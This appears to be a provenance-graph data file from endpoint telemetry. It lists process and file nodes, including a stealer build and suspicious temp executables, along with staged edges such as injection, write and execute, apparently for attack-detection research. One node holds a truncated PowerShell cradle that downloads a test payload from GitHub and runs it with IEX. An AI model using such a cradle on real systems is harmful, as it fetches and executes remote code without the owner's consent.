17
MP*-nsCFA0.tmp
SO-https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_
TP-_vnw.exe
MF-C:\Users\admin\AppData\Local\Temp\update.exe
TP-Reader_sl.exe 
TP*-soa PDF.exe
TF-\Users\admin\AppData\Local\Temp\finance.exe
MF-C:\WINDOWS\system32\scrobj.dll
TF-\Users\admin\AppData\Local\Temp\KMSpico_setup.exe
MF-sqlwriter.exe
MF-C:\MSOCache\All
MF-tasklist.exe
TP-StormKittyBuild.exe 
MP*-n4054738.exe
MP*-vdsldr.exe
MP-nsBB14.tmp
MP-client32.exe
61
1 0 RF-1
0 2 IJ-1
2 1 ST-1
0 3 RD-1
2 3 CD-1
0 4 IJ-1
1 4 RF-1
2 4 IJ-1
4 3 WR-1
0 5 IJ-1
5 1 ST-2
2 5 IJ-1
5 3 EX-2
4 5 IJ-1
2 6 WR-1
4 6 WR-1
5 6 EX-2
2 7 EX-1
4 7 WR-1
5 7 WR-2
2 8 WR-1
4 8 WR-1
5 8 RD-2
2 9 CD-1
4 9 RD-1
5 9 RD-2
2 10 EX-1
4 10 WR-1
5 10 WR-2
2 11 WR-1
4 11 WR-1
5 11 WR-2
12 3 WR-2
4 12 IJ-1
5 12 UK-2
4 13 IJ-1
13 6 WR-3
13 7 WR-3
13 8 WR-3
13 9 EX-3
13 10 WR-3
13 11 WR-3
14 6 RD-4
14 7 RD-4
14 8 WR-4
14 9 WR-4
14 10 WR-4
14 11 RD-4
13 14 UK-3
15 6 WR-4
15 7 EX-4
15 8 RD-4
15 9 EX-4
15 10 WR-4
15 11 RD-4
16 7 RD-4
16 8 RD-4
16 9 RD-4
16 10 RD-4
16 11 WR-4
15 16 UK-4

